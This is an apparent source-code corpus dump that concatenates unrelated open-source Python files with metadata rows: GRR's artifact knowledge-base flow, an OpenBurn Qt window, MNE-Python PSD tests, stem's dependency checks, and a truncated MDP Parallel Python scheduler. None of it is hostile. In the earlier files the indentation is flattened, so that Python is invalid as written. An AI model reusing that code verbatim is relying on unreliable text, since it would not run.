T417.93
N1234
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.get("Type"), "CHECK")
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -6,239,589,236,136,788,000 | 27.255385 | 74 | 0.556354 | false |
simsong/grr-insider | lib/artifact.py | 1 | 15969 | #!/usr/bin/env python
"""Base classes for artifacts."""
import logging
from grr.lib import aff4
from grr.lib import artifact_lib
from grr.lib import config_lib
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import registry
from grr.lib import utils
class AFF4ResultWriter(object):
"""A wrapper class to allow writing objects to the AFF4 space."""
def __init__(self, path, aff4_type, aff4_attribute, mode):
self.path = path
self.aff4_type = aff4_type
self.aff4_attribute = aff4_attribute
self.mode = mode
def GetArtifactKnowledgeBase(client_obj, allow_uninitialized=False):
"""This generates an artifact knowledge base from a GRR client.
Args:
client_obj: A GRRClient object which is opened for reading.
allow_uninitialized: If True we accept an uninitialized knowledge_base.
Returns:
A KnowledgeBase semantic value.
Raises:
    ArtifactProcessingError: If we failed to initialize the knowledge base.
    KnowledgeBaseUninitializedError: If called when the knowledge base has not
        been initialized.
This is needed so that the artifact library has a standardized
interface to the data that is actually stored in the GRRClient object in
the GRR datastore.
  We expect that the client KNOWLEDGE_BASE is already filled out through the
KnowledgeBaseInitialization flow, but attempt to make some intelligent
guesses if things failed.
"""
client_schema = client_obj.Schema
kb = client_obj.Get(client_schema.KNOWLEDGE_BASE)
if not allow_uninitialized and (not kb or not kb.os):
    raise artifact_lib.KnowledgeBaseUninitializedError(
        "Attempting to retrieve uninitialized KnowledgeBase for %s. Failing." %
        client_obj.urn)
if not kb:
kb = client_schema.KNOWLEDGE_BASE()
SetCoreGRRKnowledgeBaseValues(kb, client_obj)
if kb.os == "Windows":
# Add fallback values.
if not kb.environ_allusersappdata and kb.environ_allusersprofile:
# Guess if we don't have it already.
if kb.os_major_version >= 6:
kb.environ_allusersappdata = u"c:\\programdata"
kb.environ_allusersprofile = u"c:\\programdata"
else:
kb.environ_allusersappdata = (u"c:\\documents and settings\\All Users\\"
"Application Data")
kb.environ_allusersprofile = u"c:\\documents and settings\\All Users"
return kb
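# Illustrative call sketch (client_id and token are hypothetical):
#
#   client = aff4.FACTORY.Open(client_id, token=token)
#   kb = GetArtifactKnowledgeBase(client)
#
# kb is then a KnowledgeBase semantic value with kb.os, kb.hostname etc. set;
# without allow_uninitialized=True the call fails on clients whose knowledge
# base has not yet been initialized.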
def SetCoreGRRKnowledgeBaseValues(kb, client_obj):
"""Set core values from GRR into the knowledgebase."""
client_schema = client_obj.Schema
kb.hostname = utils.SmartUnicode(client_obj.Get(client_schema.FQDN, ""))
if not kb.hostname:
kb.hostname = utils.SmartUnicode(client_obj.Get(client_schema.HOSTNAME, ""))
versions = client_obj.Get(client_schema.OS_VERSION)
if versions and versions.versions:
kb.os_major_version = versions.versions[0]
kb.os_minor_version = versions.versions[1]
client_os = client_obj.Get(client_schema.SYSTEM)
if client_os:
kb.os = utils.SmartUnicode(client_obj.Get(client_schema.SYSTEM))
class KnowledgeBaseInitializationFlow(flow.GRRFlow):
  """Flow that attempts to initialize the knowledge base.
This flow processes all artifacts specified by the Artifacts.knowledge_base
config. We search for dependent artifacts following the dependency tree
specified by the "provides" attributes in the artifact definitions.
We don't try to fulfill dependencies in the tree order, the reasoning is that
some artifacts may fail, and some artifacts provide the same dependency.
Instead we take an iterative approach and keep requesting artifacts until
all dependencies have been met. If there is more than one artifact that
provides a dependency we will collect them all as they likely have
different performance characteristics, e.g. accuracy and client impact.
"""
category = "/Collectors/"
behaviours = flow.GRRFlow.behaviours + "ADVANCED"
@flow.StateHandler(next_state="ProcessBootstrap")
def Start(self):
"""For each artifact, create subflows for each collector."""
self.client = aff4.FACTORY.Open(self.client_id, token=self.token)
kb = rdfvalue.KnowledgeBase()
SetCoreGRRKnowledgeBaseValues(kb, self.client)
if not kb.os:
raise flow.FlowError("Client OS not set for: %s, cannot initialize"
" KnowledgeBase" % self.client_id)
self.state.Register("knowledge_base", kb)
self.state.Register("fulfilled_deps", [])
self.state.Register("partial_fulfilled_deps", set())
self.state.Register("all_deps", set())
self.state.Register("in_flight_artifacts", [])
self.state.Register("awaiting_deps_artifacts", [])
self.state.Register("completed_artifacts", [])
self.CallFlow("BootStrapKnowledgeBaseFlow", next_state="ProcessBootstrap")
def _GetDependencies(self):
bootstrap_artifact_names = artifact_lib.ArtifactRegistry.GetArtifactNames(
os_name=self.state.knowledge_base.os, collector_action="Bootstrap")
kb_base_set = set(config_lib.CONFIG["Artifacts.knowledge_base"])
kb_add = set(config_lib.CONFIG["Artifacts.knowledge_base_additions"])
kb_skip = set(config_lib.CONFIG["Artifacts.knowledge_base_skip"])
kb_set = kb_base_set.union(kb_add) - kb_skip
# Ignore bootstrap dependencies since they have already been fulfilled.
no_deps_names = artifact_lib.ArtifactRegistry.GetArtifactNames(
os_name=self.state.knowledge_base.os,
name_list=kb_set,
exclude_dependents=True) - bootstrap_artifact_names
name_deps, all_deps = artifact_lib.ArtifactRegistry.SearchDependencies(
self.state.knowledge_base.os, kb_set)
# We only retrieve artifacts that are explicitly listed in
# Artifacts.knowledge_base + additions - skip.
name_deps = name_deps.intersection(kb_set)
self.state.all_deps = all_deps
# Ignore bootstrap dependencies since they have already been fulfilled.
awaiting_deps_artifacts = list(name_deps - no_deps_names
- bootstrap_artifact_names)
return no_deps_names, all_deps, awaiting_deps_artifacts
@flow.StateHandler(next_state="ProcessBase")
def ProcessBootstrap(self, responses):
"""Process the bootstrap responses."""
if not responses.success:
raise flow.FlowError("Failed to run BootStrapKnowledgeBaseFlow. %s" %
responses.status)
# Store bootstrap responses
if responses.First():
for key, value in responses.First().ToDict().items():
self.state.fulfilled_deps.append(key)
self.state.knowledge_base.Set(key, value)
(no_deps_names, self.state.all_deps,
self.state.awaiting_deps_artifacts) = self._GetDependencies()
# Schedule anything with no deps next
# Send each artifact independently so we can track which artifact produced
# it when it comes back.
# TODO(user): tag SendReplys with the flow that generated them.
for artifact_name in no_deps_names:
self.state.in_flight_artifacts.append(artifact_name)
self.CallFlow("ArtifactCollectorFlow", artifact_list=[artifact_name],
knowledge_base=self.state.knowledge_base,
store_results_in_aff4=False, next_state="ProcessBase",
request_data={"artifact_name": artifact_name})
def _ScheduleCollection(self):
# Schedule any new artifacts for which we have now fulfilled dependencies.
for artifact_name in self.state.awaiting_deps_artifacts:
artifact_obj = artifact_lib.ArtifactRegistry.artifacts[artifact_name]
deps = artifact_obj.GetArtifactPathDependencies()
if set(deps).issubset(self.state.fulfilled_deps):
self.state.in_flight_artifacts.append(artifact_name)
self.state.awaiting_deps_artifacts.remove(artifact_name)
self.CallFlow("ArtifactCollectorFlow", artifact_list=[artifact_name],
store_results_in_aff4=False, next_state="ProcessBase",
request_data={"artifact_name": artifact_name},
knowledge_base=self.state.knowledge_base)
# If we're not done but not collecting anything, start accepting the partial
# dependencies as full, and see if we can complete.
if (self.state.awaiting_deps_artifacts and
not self.state.in_flight_artifacts):
if self.state.partial_fulfilled_deps:
partial = self.state.partial_fulfilled_deps.pop()
self.Log("Accepting partially fulfilled dependency: %s", partial)
self.state.fulfilled_deps.append(partial)
self._ScheduleCollection()
@flow.StateHandler(next_state="ProcessBase")
def ProcessBase(self, responses):
"""Process any retrieved artifacts."""
artifact_name = responses.request_data["artifact_name"]
self.state.in_flight_artifacts.remove(artifact_name)
self.state.completed_artifacts.append(artifact_name)
if not responses.success:
self.Log("Failed to get artifact %s. Status: %s", artifact_name,
responses.status)
else:
deps = self.SetKBValue(responses.request_data["artifact_name"],
responses)
if deps:
# If we fulfilled a dependency, make sure we have collected all
# artifacts that provide the dependency before marking it as fulfilled.
for dep in deps:
required_artifacts = artifact_lib.ArtifactRegistry.GetArtifactNames(
os_name=self.state.knowledge_base.os, provides=[dep])
if required_artifacts.issubset(self.state.completed_artifacts):
self.state.fulfilled_deps.append(dep)
else:
self.state.partial_fulfilled_deps.add(dep)
else:
self.Log("Failed to get artifact %s. Artifact failed to return value.",
artifact_name)
if self.state.awaiting_deps_artifacts:
# Schedule any new artifacts for which we have now fulfilled dependencies.
self._ScheduleCollection()
# If we fail to fulfil deps for things we're supposed to collect, raise
# an error.
if (self.state.awaiting_deps_artifacts and
not self.state.in_flight_artifacts):
missing_deps = list(self.state.all_deps.difference(
self.state.fulfilled_deps))
raise flow.FlowError("KnowledgeBase initialization failed as the "
"following artifacts had dependencies that could "
"not be fulfilled %s. Missing: %s" %
(self.state.awaiting_deps_artifacts, missing_deps))
def SetKBValue(self, artifact_name, responses):
"""Set values in the knowledge base based on responses."""
artifact_obj = artifact_lib.ArtifactRegistry.artifacts[artifact_name]
if not responses:
return None
provided = set() # Track which deps have been provided.
for response in responses:
if isinstance(response, rdfvalue.KnowledgeBaseUser):
# MergeOrAddUser will update or add a user based on the attributes
# returned by the artifact in the KnowledgeBaseUser.
attrs_provided, merge_conflicts = (
self.state.knowledge_base.MergeOrAddUser(response))
provided.update(attrs_provided)
for key, old_val, val in merge_conflicts:
self.Log("KnowledgeBaseUser merge conflict in %s. Old value: %s, "
"Newly written value: %s", key, old_val, val)
elif len(artifact_obj.provides) == 1:
# This artifact provides a single KB attribute.
value = None
provides = artifact_obj.provides[0]
if isinstance(response, rdfvalue.RDFString):
value = str(responses.First())
elif artifact_obj.collectors[0].action == "GetRegistryValue":
value = responses.First().registry_data.GetValue()
if value:
logging.debug("Set KB %s to %s", provides, value)
self.state.knowledge_base.Set(provides, value)
provided.add(provides)
else:
logging.debug("Empty KB return value for %s", provides)
else:
# We are setting a knowledgebase value for something with multiple
# provides. This isn't currently supported.
raise RuntimeError("Attempt to process broken knowledge base artifact")
return provided
def CopyUsersFromKnowledgeBase(self, client):
"""Copy users from knowledgebase to USER.
TODO(user): deprecate USER completely in favour of KNOWLEDGE_BASE.user
Args:
client: client object open for writing
"""
usernames = []
user_list = client.Schema.USER()
for kbuser in self.state.knowledge_base.users:
user_list.Append(rdfvalue.User().FromKnowledgeBaseUser(kbuser))
if kbuser.username:
usernames.append(kbuser.username)
# Store it now
client.AddAttribute(client.Schema.USER, user_list)
client.AddAttribute(client.Schema.USERNAMES(
" ".join(usernames)))
@flow.StateHandler()
def End(self, unused_responses):
"""Finish up and write the results."""
client = aff4.FACTORY.Open(self.client_id, mode="rw", token=self.token)
client.Set(client.Schema.KNOWLEDGE_BASE, self.state.knowledge_base)
self.CopyUsersFromKnowledgeBase(client)
client.Flush()
self.Notify("ViewObject", client.urn, "Knowledge Base Updated.")
self.SendReply(self.state.knowledge_base)
def UploadArtifactYamlFile(file_content, base_urn=None, token=None,
overwrite=True):
"""Upload a yaml or json file as an artifact to the datastore."""
_ = overwrite
if not base_urn:
base_urn = aff4.ROOT_URN.Add("artifact_store")
with aff4.FACTORY.Create(base_urn, aff4_type="RDFValueCollection",
token=token, mode="rw") as artifact_coll:
# Iterate through each artifact adding it to the collection.
for artifact_value in artifact_lib.ArtifactsFromYaml(file_content):
artifact_coll.Add(artifact_value)
logging.info("Uploaded artifact %s to %s", artifact_value.name, base_urn)
return base_urn
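# Illustrative usage sketch (file path and token are hypothetical):
#
#   with open("/tmp/my_artifacts.yaml") as fd:
#     coll_urn = UploadArtifactYamlFile(fd.read(), token=token)
#   LoadArtifactsFromDatastore(coll_urn, token=token)
#
# The upload stores the definitions in the artifact_store collection; loading
# then registers and validates them (see LoadArtifactsFromDatastore below).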
def LoadArtifactsFromDatastore(artifact_coll_urn=None, token=None,
overwrite_if_exists=True):
"""Load artifacts from the data store."""
loaded_artifacts = []
if not artifact_coll_urn:
artifact_coll_urn = aff4.ROOT_URN.Add("artifact_store")
with aff4.FACTORY.Create(artifact_coll_urn, aff4_type="RDFValueCollection",
token=token, mode="rw") as artifact_coll:
for artifact_value in artifact_coll:
artifact_lib.ArtifactRegistry.RegisterArtifact(
artifact_value, source="datastore:%s" % artifact_coll_urn,
overwrite_if_exists=overwrite_if_exists)
loaded_artifacts.append(artifact_value)
logging.debug("Loaded artifact %s from %s", artifact_value.name,
artifact_coll_urn)
# Once all artifacts are loaded we can validate, as validation of dependencies
  # requires that the whole group is loaded before doing the validation.
for artifact_value in loaded_artifacts:
artifact_value.Validate()
class GRRArtifactMappings(object):
"""SemanticProto to AFF4 storage mappings.
Class defining mappings between RDFValues collected by Artifacts, and the
location they are stored in the AFF4 hierarchy.
Each entry in the map contains:
1. Location stored relative to the client.
2. Name of the AFF4 type.
3. Name of the attribute to be changed.
4. Method for adding the RDFValue to the Attribute (Set, Append)
"""
rdf_map = {
"SoftwarePackage": ("info/software", "InstalledSoftwarePackages",
"INSTALLED_PACKAGES", "Append")
}
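  # Reading the single entry above as an illustration: an RDFValue of type
  # SoftwarePackage collected by an artifact is stored relative to the client
  # at info/software, in an InstalledSoftwarePackages object, by calling
  # Append on its INSTALLED_PACKAGES attribute.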
class ArtifactLoader(registry.InitHook):
"""Loads artifacts from the datastore and from the filesystem.
Datastore gets loaded second so it can override Artifacts in the files.
"""
pre = ["AFF4InitHook"]
def RunOnce(self):
for path in config_lib.CONFIG["Artifacts.artifact_dirs"]:
artifact_lib.LoadArtifactsFromDir(path)
| apache-2.0 | 2,216,893,775,539,972,600 | 40.157216 | 80 | 0.6904 | false |
tuxxi/OpenBurn | openburn/ui/mainwindow.py | 1 | 3263 | from qtpy.QtWidgets import (QWidget, QFrame, QMainWindow, QMenuBar, QStatusBar, QAction, QApplication,
QTabWidget, QVBoxLayout)
from qtpy.QtGui import QIcon
from openburn import RESOURCE_PATH
from openburn.ui.dialogs.about import AboutDialog
from openburn.ui.designtab import DesignTab
class MainWindow(QMainWindow):
"""OpenBurn's main window"""
title = "OpenBurn"
def __init__(self):
super(MainWindow, self).__init__()
self.setWindowTitle(self.title)
self.setGeometry(100, 100, 800, 600)
self.setWindowIcon(QIcon(RESOURCE_PATH + "icons/nakka-finocyl.gif"))
self.create_default_widgets()
self.setup_ui()
def create_default_widgets(self):
"""Creates static widgets such as menubar and statusbar"""
def create_menubar():
"""Create menu bar and populate it with sub menu actions"""
def file_menu():
"""Create a file submenu"""
self.file_sub_menu = self.menubar.addMenu('File')
self.open_action = QAction('Open File', self)
self.open_action.setStatusTip('Open a new design')
self.open_action.setShortcut('CTRL+O')
# self.open_action.triggered.connect(self.open_file)
self.exit_action = QAction('Exit', self)
self.exit_action.setStatusTip('Exit the application.')
self.exit_action.setShortcut('CTRL+Q')
self.exit_action.triggered.connect(QApplication.quit)
self.file_sub_menu.addAction(self.open_action)
self.file_sub_menu.addAction(self.exit_action)
def edit_menu():
                self.edit_sub_menu = self.menubar.addMenu('Edit')
            def tools_menu():
                self.tools_sub_menu = self.menubar.addMenu('Tools')
def help_menu():
"""Create help submenu"""
self.help_sub_menu = self.menubar.addMenu('Help')
self.about_action = QAction('About', self)
self.about_action.setStatusTip('About the application.')
self.about_action.setShortcut('CTRL+H')
self.about_action.triggered.connect(self.about_dialog.exec_)
self.help_sub_menu.addAction(self.about_action)
self.menubar = QMenuBar(self)
file_menu()
edit_menu()
tools_menu()
help_menu()
def create_statusbar():
self.statusbar = QStatusBar(self)
self.statusbar.showMessage("Ready", 0)
self.about_dialog = AboutDialog(self)
create_menubar()
self.setMenuBar(self.menubar)
create_statusbar()
self.setStatusBar(self.statusbar)
def setup_ui(self):
"""setup the tab widget UI"""
self.tab_widget = QTabWidget()
self.tab_widget.addTab(DesignTab(), "Design")
self.tab_widget.addTab(QWidget(), "Simulation")
self.tab_widget.addTab(QWidget(), "Propellants")
self.layout = QVBoxLayout()
self.layout.addWidget(self.tab_widget)
self.frame = QFrame()
self.frame.setLayout(self.layout)
self.setCentralWidget(self.frame)
| gpl-3.0 | -73,988,300,967,120,670 | 34.086022 | 102 | 0.592706 | false |
nicproulx/mne-python | mne/time_frequency/tests/test_psd.py | 2 | 7360 | import numpy as np
import os.path as op
from numpy.testing import assert_array_almost_equal, assert_raises
from nose.tools import assert_true
from mne import pick_types, Epochs, read_events
from mne.io import RawArray, read_raw_fif
from mne.utils import requires_version, slow_test, run_tests_if_main
from mne.time_frequency import psd_welch, psd_multitaper
base_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'tests', 'data')
raw_fname = op.join(base_dir, 'test_raw.fif')
event_fname = op.join(base_dir, 'test-eve.fif')
@requires_version('scipy', '0.12')
def test_psd():
"""Tests the welch and multitaper PSD."""
raw = read_raw_fif(raw_fname)
picks_psd = [0, 1]
# Populate raw with sinusoids
rng = np.random.RandomState(40)
data = 0.1 * rng.randn(len(raw.ch_names), raw.n_times)
freqs_sig = [8., 50.]
for ix, freq in zip(picks_psd, freqs_sig):
data[ix, :] += 2 * np.sin(np.pi * 2. * freq * raw.times)
first_samp = raw._first_samps[0]
raw = RawArray(data, raw.info)
tmin, tmax = 0, 20 # use a few seconds of data
fmin, fmax = 2, 70 # look at frequencies between 2 and 70Hz
n_fft = 128
# -- Raw --
kws_psd = dict(tmin=tmin, tmax=tmax, fmin=fmin, fmax=fmax,
picks=picks_psd) # Common to all
kws_welch = dict(n_fft=n_fft)
kws_mt = dict(low_bias=True)
funcs = [(psd_welch, kws_welch),
(psd_multitaper, kws_mt)]
for func, kws in funcs:
kws = kws.copy()
kws.update(kws_psd)
psds, freqs = func(raw, proj=False, **kws)
psds_proj, freqs_proj = func(raw, proj=True, **kws)
assert_true(psds.shape == (len(kws['picks']), len(freqs)))
assert_true(np.sum(freqs < 0) == 0)
assert_true(np.sum(psds < 0) == 0)
# Is power found where it should be
ixs_max = np.argmax(psds, axis=1)
for ixmax, ifreq in zip(ixs_max, freqs_sig):
# Find nearest frequency to the "true" freq
ixtrue = np.argmin(np.abs(ifreq - freqs))
assert_true(np.abs(ixmax - ixtrue) < 2)
# Make sure the projection doesn't change channels it shouldn't
assert_array_almost_equal(psds, psds_proj)
# Array input shouldn't work
assert_raises(ValueError, func, raw[:3, :20][0])
# test n_per_seg in psd_welch (and padding)
psds1, freqs1 = psd_welch(raw, proj=False, n_fft=128, n_per_seg=128,
**kws_psd)
psds2, freqs2 = psd_welch(raw, proj=False, n_fft=256, n_per_seg=128,
**kws_psd)
assert_true(len(freqs1) == np.floor(len(freqs2) / 2.))
assert_true(psds1.shape[-1] == np.floor(psds2.shape[-1] / 2.))
# tests ValueError when n_per_seg=None and n_fft > signal length
kws_psd.update(dict(n_fft=tmax * 1.1 * raw.info['sfreq']))
assert_raises(ValueError, psd_welch, raw, proj=False, n_per_seg=None,
**kws_psd)
# ValueError when n_overlap > n_per_seg
kws_psd.update(dict(n_fft=128, n_per_seg=64, n_overlap=90))
assert_raises(ValueError, psd_welch, raw, proj=False, **kws_psd)
# -- Epochs/Evoked --
events = read_events(event_fname)
events[:, 0] -= first_samp
tmin, tmax, event_id = -0.5, 0.5, 1
epochs = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks_psd,
proj=False, preload=True, baseline=None)
evoked = epochs.average()
tmin_full, tmax_full = -1, 1
epochs_full = Epochs(raw, events[:10], event_id, tmin_full, tmax_full,
picks=picks_psd, proj=False, preload=True,
baseline=None)
kws_psd = dict(tmin=tmin, tmax=tmax, fmin=fmin, fmax=fmax,
picks=picks_psd) # Common to all
funcs = [(psd_welch, kws_welch),
(psd_multitaper, kws_mt)]
for func, kws in funcs:
kws = kws.copy()
kws.update(kws_psd)
psds, freqs = func(
epochs[:1], proj=False, **kws)
psds_proj, freqs_proj = func(
epochs[:1], proj=True, **kws)
psds_f, freqs_f = func(
epochs_full[:1], proj=False, **kws)
# this one will fail if you add for example 0.1 to tmin
assert_array_almost_equal(psds, psds_f, 27)
# Make sure the projection doesn't change channels it shouldn't
assert_array_almost_equal(psds, psds_proj, 27)
# Is power found where it should be
ixs_max = np.argmax(psds.mean(0), axis=1)
for ixmax, ifreq in zip(ixs_max, freqs_sig):
# Find nearest frequency to the "true" freq
ixtrue = np.argmin(np.abs(ifreq - freqs))
assert_true(np.abs(ixmax - ixtrue) < 2)
assert_true(psds.shape == (1, len(kws['picks']), len(freqs)))
assert_true(np.sum(freqs < 0) == 0)
assert_true(np.sum(psds < 0) == 0)
# Array input shouldn't work
assert_raises(ValueError, func, epochs.get_data())
# Testing evoked (doesn't work w/ compute_epochs_psd)
psds_ev, freqs_ev = func(
evoked, proj=False, **kws)
psds_ev_proj, freqs_ev_proj = func(
evoked, proj=True, **kws)
# Is power found where it should be
ixs_max = np.argmax(psds_ev, axis=1)
for ixmax, ifreq in zip(ixs_max, freqs_sig):
# Find nearest frequency to the "true" freq
ixtrue = np.argmin(np.abs(ifreq - freqs_ev))
assert_true(np.abs(ixmax - ixtrue) < 2)
# Make sure the projection doesn't change channels it shouldn't
assert_array_almost_equal(psds_ev, psds_ev_proj, 27)
assert_true(psds_ev.shape == (len(kws['picks']), len(freqs)))
@slow_test
@requires_version('scipy', '0.12')
def test_compares_psd():
"""Test PSD estimation on raw for plt.psd and scipy.signal.welch."""
raw = read_raw_fif(raw_fname)
exclude = raw.info['bads'] + ['MEG 2443', 'EEG 053'] # bads + 2 more
# picks MEG gradiometers
picks = pick_types(raw.info, meg='grad', eeg=False, stim=False,
exclude=exclude)[:2]
    tmin, tmax = 0, 10  # use the first 10 s of data
    fmin, fmax = 2, 70  # look at frequencies between 2 and 70 Hz
n_fft = 2048
# Compute psds with the new implementation using Welch
psds_welch, freqs_welch = psd_welch(raw, tmin=tmin, tmax=tmax, fmin=fmin,
fmax=fmax, proj=False, picks=picks,
n_fft=n_fft, n_jobs=1)
# Compute psds with plt.psd
start, stop = raw.time_as_index([tmin, tmax])
data, times = raw[picks, start:(stop + 1)]
from matplotlib.pyplot import psd
out = [psd(d, Fs=raw.info['sfreq'], NFFT=n_fft) for d in data]
freqs_mpl = out[0][1]
psds_mpl = np.array([o[0] for o in out])
mask = (freqs_mpl >= fmin) & (freqs_mpl <= fmax)
freqs_mpl = freqs_mpl[mask]
psds_mpl = psds_mpl[:, mask]
assert_array_almost_equal(psds_welch, psds_mpl)
assert_array_almost_equal(freqs_welch, freqs_mpl)
assert_true(psds_welch.shape == (len(picks), len(freqs_welch)))
assert_true(psds_mpl.shape == (len(picks), len(freqs_mpl)))
assert_true(np.sum(freqs_welch < 0) == 0)
assert_true(np.sum(freqs_mpl < 0) == 0)
assert_true(np.sum(psds_welch < 0) == 0)
assert_true(np.sum(psds_mpl < 0) == 0)
run_tests_if_main()
| bsd-3-clause | -7,658,759,830,892,655,000 | 37.736842 | 77 | 0.588179 | false |
ewongbb/stem | stem/prereq.py | 1 | 4914 | # Copyright 2012-2017, Damian Johnson and The Tor Project
# See LICENSE for licensing information
"""
Checks for stem dependencies. We require python 2.6 or greater (including the
3.x series), but note we'll be bumping our requirements to python 2.7 in stem
2.0. Other requirements for complete functionality are...
* cryptography module
* validating descriptor signature integrity
::
check_requirements - checks for minimum requirements for running stem
is_python_3 - checks if python 3.0 or later is available
is_crypto_available - checks if the cryptography module is available
"""
import inspect
import sys
try:
# added in python 3.2
from functools import lru_cache
except ImportError:
from stem.util.lru_cache import lru_cache
CRYPTO_UNAVAILABLE = "Unable to import the cryptography module. Because of this we'll be unable to verify descriptor signature integrity. You can get cryptography from: https://pypi.python.org/pypi/cryptography"
PYNACL_UNAVAILABLE = "Unable to import the pynacl module. Because of this we'll be unable to verify descriptor ed25519 certificate integrity. You can get pynacl from https://pypi.python.org/pypi/PyNaCl/"
def check_requirements():
"""
Checks that we meet the minimum requirements to run stem. If we don't then
this raises an ImportError with the issue.
:raises: **ImportError** with the problem if we don't meet stem's
requirements
"""
major_version, minor_version = sys.version_info[0:2]
if major_version < 2 or (major_version == 2 and minor_version < 6):
raise ImportError('stem requires python version 2.6 or greater')
def _is_python_26():
"""
Checks if we're running python 2.6. This isn't for users as it'll be removed
in stem 2.0 (when python 2.6 support goes away).
:returns: **True** if we're running python 2.6, **False** otherwise
"""
major_version, minor_version = sys.version_info[0:2]
return major_version == 2 and minor_version == 6
def is_python_27():
"""
Checks if we're running python 2.7 or above (including the 3.x series).
.. deprecated:: 1.5.0
Function lacks much utility and will be eventually removed.
:returns: **True** if we meet this requirement and **False** otherwise
"""
major_version, minor_version = sys.version_info[0:2]
return major_version > 2 or (major_version == 2 and minor_version >= 7)
def is_python_3():
"""
Checks if we're in the 3.0 - 3.x range.
:returns: **True** if we meet this requirement and **False** otherwise
"""
return sys.version_info[0] == 3
@lru_cache()
def is_crypto_available():
"""
Checks if the cryptography functions we use are available. This is used for
verifying relay descriptor signatures.
:returns: **True** if we can use the cryptography module and **False**
otherwise
"""
from stem.util import log
try:
from cryptography.utils import int_from_bytes, int_to_bytes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.serialization import load_der_public_key
if not hasattr(rsa.RSAPrivateKey, 'sign'):
raise ImportError()
return True
except ImportError:
log.log_once('stem.prereq.is_crypto_available', log.INFO, CRYPTO_UNAVAILABLE)
return False
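# Typical caller-side guard (sketch; the verification call is hypothetical):
#
#   if stem.prereq.is_crypto_available():
#     verify_descriptor_signature(desc)
#   else:
#     pass  # skip signature integrity checks when cryptography is missing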
@lru_cache()
def is_mock_available():
"""
Checks if the mock module is available. In python 3.3 and up it is a builtin
unittest module, but before this it needed to be `installed separately
<https://pypi.python.org/pypi/mock/>`_. Imports should be as follows....
::
try:
# added in python 3.3
from unittest.mock import Mock
except ImportError:
from mock import Mock
:returns: **True** if the mock module is available and **False** otherwise
"""
try:
# checks for python 3.3 version
import unittest.mock
return True
except ImportError:
pass
try:
import mock
# check for mock's patch.dict() which was introduced in version 0.7.0
if not hasattr(mock.patch, 'dict'):
raise ImportError()
# check for mock's new_callable argument for patch() which was introduced in version 0.8.0
if 'new_callable' not in inspect.getargspec(mock.patch).args:
raise ImportError()
return True
except ImportError:
return False
@lru_cache()
def _is_pynacl_available():
"""
Checks if the pynacl functions we use are available. This is used for
verifying ed25519 certificates in relay descriptor signatures.
:returns: **True** if we can use pynacl and **False** otherwise
"""
from stem.util import log
try:
from nacl import encoding
from nacl import signing
return True
except ImportError:
log.log_once('stem.prereq._is_pynacl_available', log.INFO, PYNACL_UNAVAILABLE)
return False
| lgpl-3.0 | -1,769,451,857,329,862,700 | 27.241379 | 211 | 0.712658 | false |
ME-ICA/me-ica | meica.libs/mdp/parallel/pp_support.py | 1 | 13771 | """
Adapters for the Parallel Python library (http://www.parallelpython.com).
The PPScheduler class uses an existing pp scheduler and is a simple adapter.
LocalPPScheduler includes the creation of a local pp scheduler.
NetworkPPScheduler includes the management of the remote slaves via SSH.
"""
from __future__ import with_statement
import sys
import os
import time
import subprocess
import signal
import traceback
import tempfile
import scheduling
import pp
import mdp
TEMPDIR_PREFIX='pp4mdp-monkeypatch.'
def _monkeypatch_pp(container_dir):
"""Apply a hack for http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=620551.
Importing numpy fails because the parent directory of the slave
    script (/usr/share/pyshared) is added to the beginning of sys.path.
This is a temporary fix until parallel python or the way it is
packaged in debian is changed.
This function monkey-patches the ppworker module and changes the
path to the slave script. A temporary directory is created and the
worker script is copied there.
The temporary directory should be automatically removed when this
module is destroyed.
XXX: remove this when parallel python or the way it is packaged in debian is changed.
"""
import os.path, shutil
# this part copied from pp.py, should give the same result hopefully
ppworker = os.path.join(os.path.dirname(os.path.abspath(pp.__file__)),
'ppworker.py')
global _ppworker_dir
_ppworker_dir = mdp.utils.TemporaryDirectory(prefix=TEMPDIR_PREFIX, dir=container_dir)
ppworker3 = os.path.join(_ppworker_dir.name, 'ppworker.py')
shutil.copy(ppworker, ppworker3)
mdp._pp_worker_command = pp._Worker.command[:]
try:
pp._Worker.command[pp._Worker.command.index(ppworker)] = ppworker3
except TypeError:
# pp 1.6.0 compatibility
pp._Worker.command = pp._Worker.command.replace(ppworker, ppworker3)
if hasattr(mdp.config, 'pp_monkeypatch_dirname'):
_monkeypatch_pp(mdp.config.pp_monkeypatch_dirname)
class PPScheduler(scheduling.Scheduler):
"""Adaptor scheduler for the parallel python scheduler.
This scheduler is a simple wrapper for a pp server. A pp server instance
has to be provided.
"""
def __init__(self, ppserver, max_queue_length=1,
result_container=None, verbose=False):
"""Initialize the scheduler.
ppserver -- Parallel Python Server instance.
max_queue_length -- How long the queue can get before add_task blocks.
result_container -- ResultContainer used to store the results.
ListResultContainer by default.
        verbose -- If True, get progress reports from the scheduler.
"""
if result_container is None:
result_container = scheduling.ListResultContainer()
super(PPScheduler, self).__init__(result_container=result_container,
verbose=verbose)
self.ppserver = ppserver
self.max_queue_length = max_queue_length
def _process_task(self, data, task_callable, task_index):
"""Non-blocking processing of tasks.
Depending on the scheduler state this function is non-blocking or
blocking. One reason for blocking can be a full task-queue.
"""
task = (data, task_callable.fork(), task_index)
def execute_task(task):
"""Call the first args entry and return the return value."""
data, task_callable, task_index = task
task_callable.setup_environment()
return task_callable(data), task_index
while True:
if len(self.ppserver._Server__queue) > self.max_queue_length:
# release lock for other threads and wait
self._lock.release()
time.sleep(0.5)
self._lock.acquire()
else:
# release lock to enable result storage
self._lock.release()
# the inner tuple is a trick to prevent introspection by pp
# this forces pp to simply pickle the object
self.ppserver.submit(execute_task, args=(task,),
callback=self._pp_result_callback)
break
    def _pp_result_callback(self, result):
        """Callback method for pp to unpack the result and the task id.
This method then calls the normal _store_result method.
"""
if result is None:
result = (None, None)
self._store_result(*result)
def _shutdown(self):
"""Call destroy on the ppserver."""
self.ppserver.destroy()
class LocalPPScheduler(PPScheduler):
"""Uses a local pp server to distribute the work across cpu cores.
The pp server is created automatically instead of being provided by the
user (in contrast to PPScheduler).
"""
def __init__(self, ncpus="autodetect", max_queue_length=1,
result_container=None, verbose=False):
